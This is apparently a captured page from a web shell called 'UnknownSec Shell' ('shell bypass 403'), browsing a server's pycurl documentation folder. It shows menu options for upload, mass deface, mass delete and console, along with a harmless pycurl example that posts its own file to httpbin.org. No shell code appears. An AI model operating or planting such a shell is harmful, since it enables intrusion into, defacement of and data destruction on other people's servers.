shell bypass 403
UnknownSec Shell
:
/
usr
/
share
/
doc
/
python3-pycurl
/
examples
/
quickstart
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
file_upload_real.py
#! /usr/bin/env python # -*- coding: utf-8 -*- # vi:ts=4:et import pycurl c = pycurl.Curl() c.setopt(c.URL, 'https://httpbin.org/post') c.setopt(c.HTTPPOST, [ ('fileupload', ( # upload the contents of this file c.FORM_FILE, __file__, )), ]) c.perform() c.close()
© 2026 UnknownSec